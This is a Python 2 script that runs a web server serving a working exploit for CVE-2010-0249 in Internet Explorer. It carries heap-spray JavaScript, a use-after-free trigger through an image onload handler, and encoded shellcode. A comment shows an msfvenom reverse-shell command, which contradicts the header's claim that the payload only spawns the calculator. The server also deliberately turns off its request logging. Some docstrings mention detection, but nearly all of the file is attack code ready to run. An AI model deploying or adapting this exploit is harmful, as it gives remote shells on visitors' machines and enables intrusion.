#
# Author : Ahmed Obied ([email protected])
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit's payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
    """HTTP handler for the CVE-2010-0249 proof-of-concept server.

    Two paths are answered: '/' returns the page built by get_exploit()
    and '/aurora.gif' returns the image built by get_image(); any other
    path is left unanswered (see do_GET). Per-request logging is switched
    off by log_request(), so this server writes no access log of its own;
    detecting it has to rely on network or endpoint telemetry instead.
    """

    def convert_to_utf16(self, payload):
        """Encode a byte string as a run of JavaScript '%uXXXX' escapes.

        Each pair of bytes becomes one 16-bit little-endian unit:
        payload[i] is the low byte, payload[i + 1] the high byte. An
        odd-length payload raises IndexError on the final pair. This
        helper is not called anywhere in this file; get_payload() returns
        an already-encoded string.
        """
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                # j == 0 is the low byte, j == 1 the high byte (little-endian).
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            # '%%' yields a literal '%', so each unit renders as '%u' + 4 hex digits.
            enc_payload += '%%u%04x' % num
        return enc_payload

    def get_payload(self):
        """Return the pre-encoded payload substituted for '<PAYLOAD>' in get_exploit().

        The string is already in the '%uXXXX' form that the page's
        unescape() call expects. NOTE(review): the file header says the
        payload spawns the calculator, while the comment below describes
        a reverse shell; the two disagree, so treat the header as stale.
        """
        # msfvenom -p windows/shell_reverse_tcp LHOST=[IP]LPORT=4443 EXITFUNC=process -b "\x00" -f js_le
        payload = "%u95bf%u73e2%udbc3%ud9cf%u2474%u5ef4%uc931%u52b1%uee83%u31fc%u0e7e%ueb03%u91ec%uef36%ud719%u0fb9%ub8da%uea30%uf8eb%u7f27%uc95b%u2d2c%ua250%uc561%uc6e3%ueaad%u6c44%uc588%udd55%u44e8%u1cd6%ua63d%ueee7%ua730%u1220%uf5b8%u58f9%ue96f%u158e%u82ac%ub8dd%u77b4%ubb95%u2695%ue5ad%uc935%u9e62%ud17f%u9b67%u6a36%u5753%ubac9%u98ad%u8366%u6b01%uc476%u94a6%u3c0d%u29d5%ufb16%uf5a7%u1f93%u7d0f%ufb03%u52b1%u88d2%u1fbe%ud690%u9ea2%u6d75%u2bde%ua178%u6f56%u655f%u2b32%u3cfe%u9a9e%u5eff%u4241%u155a%u976c%u74d7%u54f9%u86da%uf2f9%uf56d%u5dcb%u91c6%u1567%u66c0%u0c87%uf8b4%uaf76%ud1c5%ufbbc%u4995%u8414%u897d%u5199%ud9d1%u0a35%u8992%ufaf5%uc37a%u25f9%uec9a%u4dd3%u1731%u7bb4%u17cd%u1474%u17d3%ubf65%uf15a%u2fef%uaa0b%ud687%u2016%u1639%u4d8d%u9c79%ub222%u5534%ua04e%u95a1%u9a05%ua964%ub2b3%u38eb%u4258%u2165%u15f7%u9722%uf30e%u8ede%ue1b8%u5622%ua182%uabf8%u280d%u908c%u3a29%u1848%u6e76%u4f04%ud820%u39e2%ub282%u96bc%u524c%ud538%u244e%u3045%uc839%uedf4%uf77c%u7a39%u8089%u1a27%u5b76%u2aec%uc13d%ua345%u9098%uaed7%u4f1a%ud71b%u6598%u2ce4%u0c80%u69e1%ufd06%ue29b%u01e3%u020f%u4126"
        return payload

    def get_exploit(self):
        """Return the HTML/JavaScript page served for '/'.

        The page is a verbatim template; the only substitutions are
        '<PAYLOAD>' -> get_payload() and '<NOP>' -> '%u0a0a%u0a0a'. Two
        points worth knowing for detection: check() writes
        navigator.userAgent into the document, and the <img> tag fetches
        'aurora.gif' whose onload handler (ev1) is what starts the rest of
        the script. The template's body lines are kept unindented below
        because their text is part of the served page.
        """
        exploit = '''
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
document.write(navigator.userAgent);
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'
</script>
</head>
<body>
<h2> Hello </h2>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
        # Fill the two placeholders; everything else is served as-is.
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        """Return the bytes of a minimal GIF89a image served for '/aurora.gif'.

        The first six bytes are the 'GIF89a' signature; the following
        width/height fields are 1x1. Its only role is to exist so the
        page's <img onload=...> fires.
        """
        content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        """Suppress the per-request line BaseHTTPRequestHandler would log to stderr."""
        pass

    def do_GET(self):
        """Serve '/' (exploit page) and '/aurora.gif' (image); ignore other paths.

        For any other path nothing is written to wfile, not even a status
        line. Any exception raised while serving prints an error message
        and calls sys.exit(-1).
        """
        try:
            if self.path == '/':
                # Bare Python 2 print: emits an empty line between connections.
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':
                # Requested by the page's <img> tag; its onload handler
                # starts the script in get_exploit().
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit raised inside the block above, and whether sys.exit()
        # here actually stops the server depends on how HTTPServer treats
        # exceptions escaping a handler -- not verified here.
        except:
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
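def main():
    """Start the server on the port given as the only command-line argument.

    Usage: python ie_aurora.py [port number]. The argument must be an
    integer in 1024..65535; anything else prints an error and exits with
    status -1, as does a socket error while binding or resolving the local
    hostname. A missing or extra argument prints usage and exits with 0.

    Compared with the original nesting, port validation and server setup
    are now separate try blocks, so a ValueError raised during setup is no
    longer misreported as "an invalid port number". The loop around
    serve_forever() catches only KeyboardInterrupt (the bare except it
    replaces hid every other cause of shutdown), and the listening socket
    is always closed on the way out.
    """
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)

    # Non-numeric input is folded into the out-of-range case so both
    # produce the same message and exit status.
    try:
        port = int(sys.argv[1])
    except ValueError:
        port = -1
    if port < 1024 or port > 65535:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)

    # Binding and hostname resolution are the only calls here that raise
    # socket.error (gaierror is a subclass of it).
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
    except socket.error:
        print '[*] Error : a socket error has occurred'
        sys.exit(-1)

    print '[-] Web server is running at http://%s:%d/' % (ip, port)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C is the expected way to stop the server; any other
        # exception now propagates with its traceback instead of being hidden.
        print '[-] Exiting ...'
    finally:
        # Release the listening socket whatever ended the loop.
        serv.server_close()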
if __name__ == "__main__":
    # Script entry point: only runs the server when executed directly, not on import.
    main()